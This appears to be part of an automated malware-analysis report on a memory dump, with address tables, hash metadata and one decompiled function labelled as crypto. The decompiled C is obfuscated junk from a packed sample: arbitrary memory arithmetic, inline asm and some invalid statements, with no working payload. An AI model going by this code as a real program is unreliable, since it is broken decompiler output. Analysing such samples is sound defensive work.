0x038af7e9
0x038af7eb
0x038af7f0
0x038af7f3
0x038af7f5
0x038af7f8
0x038af7fb
0x038af7fe
0x038af801
0x038af80f
0x038af814
0x038af803
0x038af803
0x038af806
0x038af806
0x00000000
0x00000000
0x0386719d
0x038671a2
0x038671a5
0x038671a9
0x038671ab
0x038af826
0x038af829
0x038671b1
0x038671b1
0x038671ba
0x038671ba
0x038671bf
0x038671c5
0x038671cf
0x038671d2
0x038671d8
0x038671dd
0x038671e4
0x038671e7
0x00000000
0x00000000
0x03867275
0x0386727a
0x0386727d
0x0386727f
0x03867282
0x03867284
0x038af6a8
0x038af6aa
0x038af6aa
0x0386728a
0x0386728f
0x03867292
0x03867297
0x0386729a
0x0386729d
0x038672a0
0x038672a5
0x038672a9
0x038672ac
0x038672af
0x038672b2
0x038672b5
0x038672b7
0x038672ba
0x038672be
0x038672be
0x038672c2
0x038672c5
0x038672c8
0x038af6b2
0x038af6b2
0x00000000
0x00000000
0x03866fc5
0x03866fc5
0x03866fcc
0x03866fd8
0x03866fda
0x03866fdd
0x03866fe3
0x03867162
0x038af845
0x00000000
0x00000000
0x038af84e
0x038af8c4
0x038af8c8
0x038af8cb
0x038af8ce
0x038670e0
0x038670e0
0x038670e3
0x038670e3
0x038670ea
0x038670ef
0x038670f1
0x038670f4
0x038670fc
0x038670fd
0x038670fe
0x0386710c
0x0386710c
0x038af850
0x038af858
0x038af87a
0x038af88a
0x038af88d
0x038af890
0x038af893
0x038af895
0x038af898
0x038af8a4
0x038af8ad
0x038af8b0
0x038af8b3
0x038af8b3
0x038af8a4
0x03866fec
0x03866fec
0x03866fee
0x00000000
0x03866ff1
0x03866ff8
0x00000000
0x03866ffe
0x03867004
0x03867006
0x03867006
0x03867010
0x03867017
0x0386701e
0x03867072
0x03867074
0x0386707e
0x03867083
0x03867087
0x03867088
0x0386706c
0x0386706c
0x0386706d
0x00000000
0x0386706d
0x0386707c
0x00000000
0x00000000
0x00000000
0x0386707c
0x03867020
0x03867023
0x038671ef
0x038671ef
0x038671f2
0x038671f7
0x00000000
0x00000000
0x038671fd
0x03867200
0x03867205
0x0386720b
0x0386720e
0x038672eb
0x00000000
0x00000000
0x038672f6
0x00000000
0x03867030
0x03867037
0x0386703e
0x03867055
0x0386705a
0x03867062
0x038af908
0x038af90e
0x038af90f
0x038af90f
0x038af908
0x03867062
0x0386705a
0x00000000
0x03867045
0x03867045
0x03867049
0x0386704a
0x0386704d
0x0386704e
0x00000000
0x0386704e
0x0386703e
0x03867068
0x03867069
0x00000000
0x03867069
0x038672fc
0x03867301
0x03867304
0x03867314
0x03867314
0x03867319
0x00000000
0x00000000
0x03867325
0x0386732d
0x03867330
0x03867356
0x03867357
0x00000000
0x00000000
0x00000000
0x00000000
0x03867332
0x03867332
0x03867337
0x00000000
0x00000000
0x03867343
0x0386734b
0x0386734e
0x03867361
0x00000000
0x00000000
0x03867367
0x03867367
0x03867368
0x00000000
0x03867368
0x03867350
0x03867351
0x03867351
0x00000000
0x03867332
0x038af8f9
0x038af8f9
0x038af8fa
0x00000000
0x038af8fa
0x03867306
0x0386730e
0x038af8ee
0x00000000
0x00000000
0x038af8f4
0x00000000
0x0386730e
0x03867214
0x03867214
0x03867217
0x00000000
0x03867217
0x0386702c
0x00000000
0x00000000
0x00000000
0x00000000
0x0386702c
0x0386708d
0x03867094
0x03867098
0x038670a0
0x0386738c
0x0386738d
0x0386738d
0x038670a0
0x03867098
0x038670a6
0x038670ab
0x038670b3
0x038670b5
0x038670cd
0x038670cd
0x038670d0
0x038670d8
0x0386711a
0x0386711c
0x0386711c
0x03867121
0x00000000
0x00000000
0x03867129
0x00000000
0x00000000
0x0386712b
0x0386712b
0x03867130
0x0386737e
0x03867381
0x00000000
0x03867381
0x03867138
0x00000000
0x00000000
0x03867144
0x03867144
0x038670da
0x038670da
0x038670dd
0x00000000
0x038670dd
0x038670b7
0x038670b8
0x038670bb
0x038670c2
0x00000000
0x00000000
0x038670c7
0x00000000
0x00000000
0x038670c9
0x038670ca
0x00000000
0x038670ad
0x038670ad
0x038670af
0x00000000
0x038670af
0x03867148
0x0386714d
0x038af8e2
0x038af8e2
0x03867153
0x03867154
0x03867157
0x00000000
0x03867157
0x038af87c
0x038af87f
0x038af882
0x00000000
0x038af882
0x038af85e
0x00000000
0x00000000
0x038af864
0x038af869
0x038af86c
0x00000000
0x038af86c
0x03867168
0x03867170
0x038af8d6
0x038af8d6
0x03867176
0x03867179
0x00000000
0x03867179
0x03866fe9
0x03866fe9
0x00000000
0x03866fe9
0x03866fbf
0x03866f8c
0x03866f93
0x038672d6
0x00000000
0x00000000
0x00000000
0x038672d6
0x03866f99
0x03866f99
0x03866f99
0x00000000
0x03866f68
0x03866f50
0x03866f56
0x0386722c
0x038af629
0x038af629
0x00000000
0x038af629
0x03867232
0x03867239
0x038af623
0x00000000
0x00000000
0x00000000
0x038af623
0x0386723f
0x03867242
0x038af64e
0x038af64e
0x00000000
0x038af64e
0x03867248
0x0386724f
0x03867373
0x00000000
0x00000000
0x00000000
0x03867379
0x03867255
0x03867258
0x038af63c
0x038af648
0x00000000
0x038af648
0x0386725e
0x03867265
0x038af636
0x00000000
0x00000000
0x00000000
0x038af636
0x0386726b
0x0386726b
0x00000000
0x00000000
0x00000000
0x00000000
0x03866f56
0x03866f3d
0x03866ed2
0x00000000
0x03866ec4

Memory Dump Source

Source File: 00000002.00000002.740509819.0000000003820000.00000040.00000001.sdmp, Offset: 03820000, based on PE: true

Associated: 00000002.00000002.740700423.000000000393B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.740721530.000000000393F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9219b8da37f29676e0cf7cee56949c82069566e1667c5306f3727dd9f9e1e36a
Instruction ID: 9b7753ede5e7831055a59870f95a33d135524473032a3840fdc7965b07187530
Opcode Fuzzy Hash: 9219b8da37f29676e0cf7cee56949c82069566e1667c5306f3727dd9f9e1e36a
Instruction Fuzzy Hash: AF028B70D14659CBCB28CFD8C484AADF7B5BF44708F2941AEF816EB290E7709891CB91

Uniqueness

Uniqueness Score: -1.00%

Function 1042CB3E, Relevance: .5, Instructions: 465
COMMONCrypto

Download Yara Rule

C-Code - Quality: 58%

			E1042CB3E(signed int __ebx, signed int __edx, signed int __edi, signed int __esi, void* __eflags) {
				signed int _t65;
				signed char _t70;
				signed int _t90;

				_t90 = __esi;
				_t86 = __edi;
				_t71 = __edx;
				_t65 = __ebx;
				asm("adc eax, 0xfc1d43e9");
				_push(__esi);
				if(__eflags <= 0) {
					asm("sbb esp, [0x81a37777]");
					__ebx = __ebx -  *0x9a69bc96;
					_pop(__ebp);
					__ebp = __ebp + 1;
					__cl = 0xb2;
					__edi = __edi + 1;
					__dl -  *0xb2295082 =  *0x1ec4219e & __ebp;
					asm("adc [0x49e4288], bh");
					__ch = __ch + 0xe3;
					_t14 = __edx;
					__edx =  *0xdaef12ba;
					 *0xdaef12ba = _t14;
					 *0x94590739 =  *0x94590739 >> 0x27;
					__eflags =  *0x94590739;
					asm("ror byte [0xb61c362c], 0x93");
					if( *0x94590739 == 0) {
						asm("sbb ebp, [0x6e1e167b]");
						__cl = 0xb7;
						_pop(__eax);
						__edx = __edx + 1;
						asm("adc edx, [0x46620b97]");
						asm("lodsb");
						asm("rcl byte [0x6317502a], 0x82");
						__eflags = __esi -  *0x569ddf97;
						_t15 = __esi;
						__esi =  *0xdcfac2b;
						 *0xdcfac2b = _t15;
						 *0x175c79dc = __eax;
						asm("ror dword [0xabb5192f], 0xbe");
						asm("adc esp, [0x8e72f6bc]");
						__ah = __ah |  *0x78de1808;
						_push( *0x32593e29);
						asm("adc esi, [0x3edacdf5]");
						asm("scasd");
						__eax = __eax |  *0x923319b8;
						_t16 = __ebp;
						__ebp =  *0xd110c135;
						 *0xd110c135 = _t16;
						_push( *0x3572e721);
						__eflags = __ebp -  *0xb4c13466;
						__dh = __dh ^ 0x00000034;
						__ecx = __ecx - 1;
						__edx = __edx + 1;
						 *0xe8266da9 =  *0xe8266da9 << 0xe2;
						__eflags =  *0xf9047217 & __ebx;
						__bh = __bh - 0x20;
						 *0x791f32b7 =  *0x791f32b7 | __ch;
						_push(__ebx);
						asm("ror byte [0x622d8cb2], 0xa9");
						asm("rol dword [0xc1d7b807], 0x59");
						 *0x4398abb7 =  *0x4398abb7 | __ch;
						 *0xeb5cb93a =  *0xeb5cb93a & __ah;
						__eflags =  *0xeb5cb93a;
						_t19 = __ebx;
						__ebx =  *0x8f3de796;
						 *0x8f3de796 = _t19;
						asm("adc [0xd005abef], eax");
						asm("cmpsb");
						if( *0xeb5cb93a < 0) {
							__esi =  *0x559f17d * 0x84ac;
							__eflags = __esi;
							asm("rol dword [0x559e966], 0xba");
							if(__esi >= 0) {
								__eax = __eax & 0x59da4a70;
								asm("adc eax, [0x646b8805]");
								 *0x980559ee =  *0x980559ee & __esi;
								__esp = __esp +  *0x59f06868;
								asm("sbb [0x54699805], ecx");
								asm("ror byte [0x2d0359e0], 0x42");
								 *0x5b040fce =  *0x5b040fce >> 0xa1;
								__eflags =  *0x45a15fc - __ebx;
								__eax = __eax + 0x5a1a7567;
								 *0x207b6d04 =  *0x207b6d04 >> 0x38;
								_pop(__edx);
								__bl = __bl &  *0x227a5e04;
								_pop(__edx);
								__eflags = __ecx -  *0x4f887705;
								__esp = __esp - 0x470559d4;
								if(__ecx >=  *0x4f887705) {
									 *0x59da4870 =  *0x59da4870 - __edx;
									__ebx = __ebx ^  *0x496a5e05;
									 *0x170759dc =  *0x170759dc - __eax;
									 *0xeab4e52e =  *0xeab4e52e ^ __esi;
									__eflags =  *0xd90775b3 & __dh;
									__edi = __edi +  *0xe797b7fd;
									__ch = __ch & 0x000000b5;
									__eflags = __ch;
									if(__ch == 0) {
										__esp = __esp + 0x349a0775;
										__eflags =  *0xb7e9cd3c - __bl;
										if( *0xb7e9cd3c == __bl) {
											__ebp = __ebp | 0x49bb0775;
											__eflags = __ebp;
											_push( *0xaf840e68);
											if(__ebp == 0) {
												__eflags =  *0xd6290875 & __edx;
												__edx = __edx |  *0x1b976cbe;
												 *0x97080312 = __dl;
												__dh = __dh +  *0xbea1cdb2;
												asm("ror byte [0x80318c6], 0x58");
												 *0xc4076e65 = __edx;
												__ah = __ah |  *0x30df924;
												asm("sbb [0xb5caaf08], ch");
												__eflags = __eax -  *0x24d2b283;
												__eflags =  *0x573741c8 - __edi;
												__edx = 0x93df196;
												 *0x19472e17 =  *0x19472e17 | 0x093df196;
												asm("adc dl, [0xe99587e5]");
												_push( *0x349b093d);
												__eax & 0x93d640cd = __esi -  *0xa3dea98;
												_t26 = __eax;
												__eax =  *0xc40c0ea1;
												 *0xc40c0ea1 = _t26;
												asm("adc ch, 0x3c");
												 *0x58e19a91 =  *0x58e19a91 >> 0x97;
												__ch =  *0xabae0b00;
												asm("rol dword [0x718f659c], 0x15");
												__cl = 0xb7 +  *0xbf3340f2;
												asm("lodsd");
												 *0x92c0d108 =  *0x92c0d108 << 0x42;
												asm("adc ebp, 0xcf71c13");
												__esp = __esp +  *0xbec51103;
												asm("movsw");
												_pop(__ecx);
												 *0x874443b3 =  *0x874443b3 << 0x82;
												__ebp =  *0x61972789;
												__ebx = 0xecd80903;
												__edi = __edi | 0xf3f2ef1e;
												 *0x7ade6514 =  *0x7ade6514 ^ __bl;
												__ah = __ah |  *0x8f5a381c;
												__edx =  *0x5564bcdc;
												__ebp =  *0x4df1826a * 0x8e43;
												asm("adc ebp, [0x12ffa061]");
												__edx =  *0x5564bcdc - 1;
												__eflags =  *0x80dbfc2d & __ebp;
												asm("adc dl, 0x28");
												_push(__esi);
												__dh = __dh +  *0x523226b2;
												 *0xb3de113a =  *0xb3de113a - __dh;
												__ecx = __ecx - 0xb2edc8f;
												__eflags = __esi -  *0x96073019;
												if(__esi !=  *0x96073019) {
													asm("sbb eax, [0x4735fd74]");
													asm("scasd");
													__eflags =  *0xe06adca & __ah;
													if(( *0xe06adca & __ah) >= 0) {
														asm("sbb edi, 0xd51c1e70");
														asm("scasb");
														asm("sbb bh, [0x117f560c]");
														__ch =  *0x7eb931d0;
														_pop(__ecx);
														__bh = __bh & 0x0000003a;
														asm("adc ch, [0x7a4efb7]");
														L1();
														asm("rcr dword [0xbe3062e8], 0x45");
														 *0x16757829 =  *0x16757829 << 0x6e;
														__eflags =  *0x16757829;
														if( *0x16757829 < 0) {
															__esp & 0xa5eccb79 =  *0x46040a3d - __ebp;
															__esi = __esi - 0xd8a4c92d;
															asm("sbb esp, 0x158d7d1b");
															__eflags =  *0x487a1316 & __edi;
															__edx = __edx ^ 0x35117e33;
															asm("sbb bl, 0x2c");
															asm("rol dword [0x84acdc23], 0x4f");
															__ecx = __ecx &  *0xaf3bf2cb;
															 *0xcb73b32f =  *0xcb73b32f >> 0xb5;
															__bl = __bl -  *0x1cf32f32;
															__edx = __edx +  *0x356625d3;
															__eflags = __edx;
															asm("cmpsb");
															if(__edx > 0) {
																asm("adc edi, 0xa4d2ca76");
																asm("sbb esi, 0x61e08b99");
																__esp = __esp + 1;
																asm("rol dword [0xacf77dd4], 0x83");
																 *0xc5e42e02 =  *0xc5e42e02 ^ 0x000000b2;
																asm("movsw");
																 *0xc6b2553e =  *0xc6b2553e >> 1;
																 *0xebeb10b6 =  *0xebeb10b6 | 0x000000b2;
																__eflags =  *0xd64255be & __esp;
																asm("adc [0xa081c9fb], edi");
																asm("rcl dword [0xfe13de0b], 0x86");
																asm("adc [0x52269c1], ecx");
																__ch = __ch ^  *0x720566d7;
																asm("sbb [0x9a000c86], ah");
																__ebx = __ebx &  *0x2bb225a9;
																__eax = 0xdb16878d;
																__eax = 0xdb16878d -  *0x14718399;
																 *0x389d6eea =  *0x389d6eea & __ebp;
																asm("rcr byte [0x32d7142c], 0x48");
																 *0xd7979d64 =  *0xd7979d64 & __esi;
																__esp =  *0x4775346b * 0xb1c8;
																__eflags = __esp;
																_pop(__ecx);
																_pop( *0x9937e8f0);
																if(__eflags < 0) {
																	 *0xbd8bab7d * 0x200c =  *0x6f1c2c91;
																	 *0x6f1c2c91 =  *0xbd8bab7d * 0x200c;
																	 *0x2989c0d5 = __esp;
																	 *0xf0f683ec = __esi;
																	__edx =  *0x2aa866b * 0xe8ea;
																	 *0xdb5204a2 =  *0xdb5204a2 << 0x2f;
																	 *0x396bd1bb =  *0x396bd1bb +  *0x6f1c2c91;
																	 *0x5cb59204 =  *0x5cb59204 >> 0xd6;
																	__eflags =  *0x880b01f8 & __ecx;
																	asm("sbb bh, 0xa8");
																	__esi = __esi + 1;
																	__esp = 0xdcf70eff;
																	asm("stosb");
																	__edi = __edi |  *0x49162189;
																	 *0xfba18917 =  *0xfba18917 << 0xfe;
																	__eax = __eax &  *0x11c3c181;
																	__ah = __ah &  *0x1d47a228;
																	__ecx = __ecx + 0xedb95f3f;
																	 *0xb899a2d7 =  *0xb899a2d7 >> 0xfa;
																	__eax = __eax -  *0x2cbf4107;
																	__ecx = __ecx -  *0xafdd19f3;
																	 *0x91d0cd12 =  *0x91d0cd12 | __bl;
																	asm("adc esp, 0x4488e589");
																	__esi = __esi + 1;
																	asm("adc [0x6fbc6a28], bl");
																	__edi = 0xc762e0d6;
																	__eflags =  *0x399bc3fc & __ebp;
																	__eax = __eax &  *0xf72982ef;
																	__ecx = __ecx - 1;
																	_t42 = __ebp;
																	__ebp =  *0x2362c7cc;
																	 *0x2362c7cc = _t42;
																	__esi = __esi +  *0xf7c29f33;
																	__eflags = __esi;
																	__ebx =  *0xd3785f97;
																	if(__esi < 0) {
																		__esp =  *0x4080f17d * 0xd011;
																		__ecx = __ecx ^  *0x569aa5dd;
																		__eflags = __ecx;
																		asm("ror byte [0x604113e0], 0xd6");
																		if(__ecx >= 0) {
																			__eflags = __esi -  *0xce9b5478;
																			__cl = __cl -  *0xc135cf28;
																			__eflags =  *0x5d42e1d7 & 0x000000b2;
																			asm("rcr dword [0x9ec808f1], 0xd8");
																			asm("adc ebp, [0xfc64306e]");
																			asm("adc edi, [0x52150307]");
																			_pop(__eax);
																			_push( *0x5d88d3fc);
																			 *0x61cae086 =  *0x61cae086 - __bh;
																			__ecx = __ecx + 1;
																			asm("adc [0x646e8466], ebx");
																			__ch = __ch | 0x00000038;
																			asm("sbb edx, 0xc2cef83");
																			__ebp =  *0xc325113d;
																			__esi = __esi - 0xb2ea66c8;
																			asm("scasb");
																			__bl = __bl | 0x00000004;
																			_pop(__esi);
																			__esi = __esi |  *0x4d85d085;
																			__esi = __esi - 0xf3ea77d8;
																			__cl = __cl -  *0x10f36d14;
																			 *0xf4b69cee =  *0xf4b69cee << 0xba;
																			__edi = 0xffffffffc762e0d5;
																			__eflags = __edx -  *0x9cb6c7bd;
																			asm("rcr dword [0xb50d9dc8], 0x95");
																			asm("adc al, 0x8");
																			__esi = __esi ^  *0xbffa8b9;
																			__eflags = __esi;
																			_push( *0x820d3917);
																			if(__esi < 0) {
																				 *0x34258e71 - __edx = __dh -  *0x11adc7a8;
																				__edi = 0xffffffff8760e0c0;
																				__esp = __esp ^  *0x8c393c98;
																				 *0xd55e176d =  *0xd55e176d | __esi;
																				__ebp = __ebp - 1;
																				__eflags = __ebx & 0xf3ea77d8;
																				__edx = __edx |  *0x5276660e;
																				__bh =  *0x861bf4e6;
																				asm("ror dword [0xce3057ea], 0x39");
																				__esi = __esi &  *0xdc3e22b;
																				 *0x1243821 =  *0x1243821 << 0x11;
																				__eflags =  *0x5ffa9e8a & __bl;
																				_push( *0x2bd8d783);
																				_t49 = __edx;
																				__edx =  *0x11751f31;
																				 *0x11751f31 = _t49;
																				_push( *0x1f9b41c5);
																				__esi = __esi &  *0x248e966e;
																				_t50 = __bl;
																				__bl =  *0xdaeb191a;
																				 *0xdaeb191a = _t50;
																				__ecx = __ecx &  *0x9916c4ee;
																				__eflags =  *0x78c6ed91 & __ecx;
																				if(( *0x78c6ed91 & __ecx) <= 0) {
																					asm("adc eax, [0x96291577]");
																					 *0x17a930b6 =  *0x17a930b6 << 0xe3;
																					__eflags =  *0x17a930b6;
																					asm("rcr byte [0x67d20ab7], 0xf6");
																					asm("rcl byte [0xa2122ec6], 0x99");
																					asm("rol dword [0xc0050ea], 0xd9");
																					 *0xb1eee5cc = __ecx;
																					if(__eflags != 0) {
																						asm("sbb ecx, [0x8a691474]");
																						if(__eflags < 0) {
																							__edx = __edx +  *0xa40a1079;
																							__eflags = 0xc762e0d6 -  *0xb0fa620b;
																							asm("rol dword [0x25a37419], 0xa7");
																							_t53 = __al;
																							__al =  *0xadc7a834;
																							 *0xadc7a834 = _t53;
																							_t54 = __edx;
																							__edx =  *0xd20060f;
																							 *0xd20060f = _t54;
																							asm("adc esi, [0xae5f94cf]");
																							_t55 = __ecx;
																							__ecx =  *0x768aa5fb;
																							 *0x768aa5fb = _t55;
																							if(0xc762e0d6 !=  *0xb0fa620b) {
																								__eflags =  *0xc03a5674 & __ebp;
																								asm("ror byte [0xc822980c], 0xc1");
																								asm("adc al, 0xa8");
																								__eflags =  *0x9b752e86 - __bl;
																								 *0xa40d05fe =  *0xa40d05fe ^ __ebp;
																								asm("adc [0xd1006016], eax");
																								 *0xd099d267 =  *0xd099d267 | __edx;
																								asm("sbb al, 0x18");
																								 *0x9498a501 =  *0x9498a501 << 0xe;
																								__eflags =  *0x9498a501;
																								_t58 = __ecx;
																								__ecx =  *0x2d334168;
																								 *0x2d334168 = _t58;
																								asm("ror dword [0x52e44264], 0x12");
																								__esp = __esp - 1;
																								if( *0x9498a501 > 0) {
																									__edi =  *0x98fb157e * 0x1eab;
																									__bl = __bl ^ 0x00000002;
																									__dl = __dl &  *0x52ec9a8a;
																									__eflags = __dl;
																									if(__dl == 0) {
																										 *0x6a71c97b =  *0x6a71c97b + __edi;
																										 *0x830511bd =  *0x830511bd << 0xcc;
																										_push( *0x3d0c2cef);
																										 *0x6eb11f1c =  *0x6eb11f1c << 4;
																										__esi = __esi - 1;
																										 *0x813ae614 =  *0x813ae614 ^ 0x000000b2;
																										asm("adc edx, [0x49930bf7]");
																										__dl = __dl +  *0xb43ea8c9;
																										__eax = __eax + 1;
																										asm("adc [0x9eaf3eef], edx");
																										__eflags = __edx -  *0x73201966;
																										__al = __al | 0x000000e0;
																										asm("adc eax, 0x980ab6a9");
																										asm("adc dh, [0x6dc5353a]");
																										__ebp = __ebp - 1;
																										__eflags = __eax & 0x0052eb9f;
																										 *0x25846d10 =  *0x25846d10 & __bh;
																										 *0xc1c52bed = __esp;
																										asm("sbb [0x92988004], dh");
																										 *0x7fb66a9c =  *0x80651769 * 0xde5f;
																										asm("adc bh, [0xc36713e0]");
																										__al = __al +  *0x91b833a8;
																										 *0x201ed994 =  *0x201ed994 << 0x6d;
																										 *0x3a8963b7 =  *0x3a8963b7 + __ah;
																										 *0x18a45be2 =  *0x18a45be2 >> 0xc1;
																										__bl = __bl - 0x18;
																										_t61 = __dh;
																										__dh =  *0x9bfc7ab0;
																										 *0x9bfc7ab0 = _t61;
																										__eax =  *0xbd6710c0;
																									}
																								}
																							}
																						}
																					}
																				}
																			}
																		}
																	}
																}
															}
														}
													}
												}
											}
										}
									}
								}
							}
						}
					}
				}
				while(1) {
					L1:
					 *0xfa1eb509 =  *0xfa1eb509 ^ _t90;
					_push( *0x580d3dc0);
					asm("cmpsw");
					_t86 = _t86 + 1;
					 *0xf41dd608 =  *0xf41dd608 & _t70;
					_pop(_t70);
					_t90 = _t90 &  *0x4f18cd09;
					asm("ror dword [0x672c13f1], 0xbc");
					asm("rcl dword [0xeb002dd3], 0xd5");
					_push(0x99cd10c7);
					_t71 =  *0x68f1331 - 0x3ea03fbe + 0x1782a761 |  *0xe110cb13;
					_push(_t65 + 0x00000001 &  *0x906ca113 &  *0x39f6f8e0);
					asm("sbb ecx, 0x98ea096e");
					 *0x57f16018 =  *0x57f16018 << 0xde;
					_t62 =  *0xbca846e6 - 1;
					asm("adc bl, [0xbeef0900]");
					_t65 =  *0x3c329a6b * 0x9bcd;
					asm("sbb ecx, [0xb1c6053d]");
					if(_t65 < 0) {
						continue;
					}
					L2:
					_t86 = 0xa59e678;
					 *0x4a40a00 = _t71;
					 *0x8bbf26b7 =  *0x8bbf26b7 << 0x6d;
					_t90 = _t90 - 0x00000001 |  *0x4fe887;
					asm("adc esp, [0xc0e5720f]");
					asm("cmpsw");
					 *0x9523e1c4 =  *0x9523e1c4 << 0x95;
					_pop(_t71);
					asm("rol dword [0x5212c031], 0x27");
					_t62 = _t62 + 1;
					_t5 = _t65;
					_t65 =  *0x3349bcd7;
					 *0x3349bcd7 = _t5;
					 *0x88fe6a95 =  *0x88fe6a95 + 0xa59e678;
					 *0xf9eba80d =  *0xf9eba80d & _t62;
					 *0x2b2ef2d9 =  *0x2b2ef2d9 & _t62;
					asm("adc esi, [0x6c50de6c]");
					 *0xfbf4bf63 =  *0xfbf4bf63 & _t65;
					asm("movsb");
					 *0x264f8e88 =  *0x264f8e88 | _t65;
					if( *0x264f8e88 > 0) {
						while(1) {
							L1:
							 *0xfa1eb509 =  *0xfa1eb509 ^ _t90;
							_push( *0x580d3dc0);
							asm("cmpsw");
							_t86 = _t86 + 1;
							 *0xf41dd608 =  *0xf41dd608 & _t70;
							_pop(_t70);
							_t90 = _t90 &  *0x4f18cd09;
							asm("ror dword [0x672c13f1], 0xbc");
							asm("rcl dword [0xeb002dd3], 0xd5");
							_push(0x99cd10c7);
							_t71 =  *0x68f1331 - 0x3ea03fbe + 0x1782a761 |  *0xe110cb13;
							_push(_t65 + 0x00000001 &  *0x906ca113 &  *0x39f6f8e0);
							asm("sbb ecx, 0x98ea096e");
							 *0x57f16018 =  *0x57f16018 << 0xde;
							_t62 =  *0xbca846e6 - 1;
							asm("adc bl, [0xbeef0900]");
							_t65 =  *0x3c329a6b * 0x9bcd;
							asm("sbb ecx, [0xb1c6053d]");
							if(_t65 < 0) {
								continue;
							}
							goto L2;
							do {
								do {
									do {
										goto L1;
									} while (_t65 < 0);
									goto L2;
								} while ( *0x264f8e88 > 0);
								goto L3;
							} while (_t65 > 0);
							_t90 = _t90 + 1;
							 *0xfefef7a3 =  *0xfefef7a3 & 0x000000e2;
							_t71 =  *0x10419a6b * 0xbbac;
							asm("rcl byte [0x88b42c24], 0x72");
							if( *0x10419a6b * 0xbbac < 0) {
								continue;
							} else {
								asm("adc [0xe1101828], ch");
								 *0x2505e1b = 0xe2;
								 *0x46095dfe =  *0x46095dfe >> 0xa;
								_t86 = _t86 &  *0x823b6816 ^ 0x09e46026;
								 *0xe9e29ae1 =  *0xe9e29ae1 << 0x18;
								asm("adc esi, [0x90095033]");
								_t62 = 0x000000e2 |  *0xc62cb800;
								 *0x3ddc999c =  *0x3ddc999c << 0x83;
								_t65 = _t65 +  *0xfc00f70b;
								 *0xfaaf979a =  *0xfaaf979a << 0xa9;
								 *0xf34266f6 =  *0xf34266f6 + 0xf7;
								_t71 = 0xf8;
								_push( *0xe143f9f5);
								if(0xf8 != 0) {
									continue;
								} else {
									return _t62;
								}
							}
						}
					}
					L3:
					 *0xe1b86fd =  *0xe1b86fd + 0xa59e678;
					asm("rcr byte [0x9596b9a0], 0x22");
					_push(_t62);
					asm("scasb");
					 *0x8a352a1 =  *0x8a352a1 ^ _t70;
					asm("cmpsb");
					 *0x85e36f26 =  *0x85e36f26 | (0x0a59e678 &  *0x6f73befd) + 0x00000001;
					asm("sbb [0x1a5feac4], esi");
					_push( *0x123f78f5);
					asm("cmpsw");
					_t86 =  *0x6b990860 * 0xc934;
					_t71 =  *0x348d1d6a * 0x2362;
					_pop(_t70);
					asm("sbb [0x8fd586ee], esp");
					_t62 = 0xe2;
					_t65 = _t65 - 0x00000001 ^  *0x70dd7c98;
					asm("rcr dword [0xd9d6e636], 0x1d");
					L1:
					 *0xfa1eb509 =  *0xfa1eb509 ^ _t90;
					_push( *0x580d3dc0);
					asm("cmpsw");
					_t86 = _t86 + 1;
					 *0xf41dd608 =  *0xf41dd608 & _t70;
					_pop(_t70);
					_t90 = _t90 &  *0x4f18cd09;
					asm("ror dword [0x672c13f1], 0xbc");
					asm("rcl dword [0xeb002dd3], 0xd5");
					_push(0x99cd10c7);
					_t71 =  *0x68f1331 - 0x3ea03fbe + 0x1782a761 |  *0xe110cb13;
					_push(_t65 + 0x00000001 &  *0x906ca113 &  *0x39f6f8e0);
					asm("sbb ecx, 0x98ea096e");
					 *0x57f16018 =  *0x57f16018 << 0xde;
					_t62 =  *0xbca846e6 - 1;
					asm("adc bl, [0xbeef0900]");
					_t65 =  *0x3c329a6b * 0x9bcd;
					asm("sbb ecx, [0xb1c6053d]");
				}
			}

0x1042cb3e
0x1042cb3e
0x1042cb3e
0x1042cb3e
0x1042cb3e
0x1042cb43
0x1042cb44
0x1042cb4a
0x1042cb50
0x1042cb56
0x1042cb57
0x1042cb58
0x1042cb5a
0x1042cb61
0x1042cb67
0x1042cb6d
0x1042cb70
0x1042cb70
0x1042cb70
0x1042cb76
0x1042cb76
0x1042cb7d
0x1042cb84
0x1042cb8a
0x1042cb90
0x1042cb93
0x1042cb94
0x1042cb95
0x1042cb9b
0x1042cb9c
0x1042cba3
0x1042cba9
0x1042cba9
0x1042cba9
0x1042cbaf
0x1042cbb4
0x1042cbbb
0x1042cbc1
0x1042cbc7
0x1042cbcd
0x1042cbd3
0x1042cbd4
0x1042cbda
0x1042cbda
0x1042cbda
0x1042cbe0
0x1042cbe6
0x1042cbec
0x1042cbef
0x1042cbf0
0x1042cbf1
0x1042cbf8
0x1042cbfe
0x1042cc01
0x1042cc07
0x1042cc08
0x1042cc0f
0x1042cc16
0x1042cc1c
0x1042cc1c
0x1042cc22
0x1042cc22
0x1042cc22
0x1042cc28
0x1042cc2e
0x1042cc2f
0x1042cc35
0x1042cc35
0x1042cc3f
0x1042cc47
0x1042cc4d
0x1042cc52
0x1042cc58
0x1042cc5e
0x1042cc64
0x1042cc6a
0x1042cc71
0x1042cc78
0x1042cc7e
0x1042cc83
0x1042cc8a
0x1042cc8b
0x1042cc91
0x1042cc92
0x1042cc98
0x1042cc9e
0x1042cca4
0x1042ccaa
0x1042ccb0
0x1042ccb6
0x1042ccbc
0x1042ccc2
0x1042ccc8
0x1042ccc8
0x1042cccb
0x1042ccd1
0x1042ccd7
0x1042ccdd
0x1042cce3
0x1042cce3
0x1042cce9
0x1042ccef
0x1042ccf5
0x1042ccfb
0x1042cd01
0x1042cd07
0x1042cd0d
0x1042cd14
0x1042cd1a
0x1042cd20
0x1042cd26
0x1042cd31
0x1042cd37
0x1042cd3c
0x1042cd42
0x1042cd48
0x1042cd53
0x1042cd59
0x1042cd59
0x1042cd59
0x1042cd5f
0x1042cd62
0x1042cd69
0x1042cd6f
0x1042cd76
0x1042cd7c
0x1042cd7d
0x1042cd84
0x1042cd8a
0x1042cd90
0x1042cd92
0x1042cd93
0x1042cd9a
0x1042cda0
0x1042cda1
0x1042cda7
0x1042cdad
0x1042cdb3
0x1042cdb9
0x1042cdc3
0x1042cdc9
0x1042cdca
0x1042cdd0
0x1042cdd3
0x1042cdd4
0x1042cdda
0x1042cde0
0x1042cde6
0x1042cdec
0x1042cdf2
0x1042cdf8
0x1042cdf9
0x1042cdff
0x1042ce05
0x1042ce0b
0x1042ce0c
0x1042ce12
0x1042ce18
0x1042ce19
0x1042ce1c
0x1042ce22
0x1042ce27
0x1042ce2e
0x1042ce2e
0x1042ce35
0x1042ce41
0x1042ce47
0x1042ce4d
0x1042ce53
0x1042ce59
0x1042ce5f
0x1042ce62
0x1042ce69
0x1042ce6f
0x1042ce76
0x1042ce7c
0x1042ce7c
0x1042ce82
0x1042ce83
0x1042ce89
0x1042ce8f
0x1042ce95
0x1042ce96
